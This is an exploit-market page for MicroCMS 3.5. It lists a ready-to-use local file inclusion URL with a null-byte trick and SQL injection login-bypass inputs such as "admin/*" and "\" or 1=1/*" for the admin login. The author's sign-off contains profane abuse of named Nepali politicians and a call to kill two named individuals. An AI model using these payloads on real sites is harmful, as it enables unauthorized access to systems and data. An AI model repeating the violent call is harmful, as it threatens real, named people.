[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MicroCMS 3.5 (SQL/LFI) Multiple Remote Vulnerabilities

Author
learn3r hacker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5774
Category
web applications
Date add
15-09-2009
Platform
unsorted
======================================================
MicroCMS 3.5 (SQL/LFI) Multiple Remote Vulnerabilities
======================================================


#################################################
#        Micro CMS File inclusion Vuln		#
#	 Micro CMS SQLi login bypass		#
#	 By learn3r hacker from Nepal		#
#################################################

Affected version: v 3.5 or may be lower...

#############################################
#		File Inclusion Vuln	    #
#############################################

Requires register globals to be on...

Vuln file: microcms-inlude.php
http://localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=[FileInclusion]%00


#############################################
#		SQLi Login Bypass           #  
#############################################

Vuln file: microcms-admin-login.php

Username: valid_username/*   [eg. admin/*]
Password: learn3r  [or whatever]

Or Username: " or 1=1/*
Password: learn3r  [or whatever]



Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!





#  0day.today [2024-12-26]  #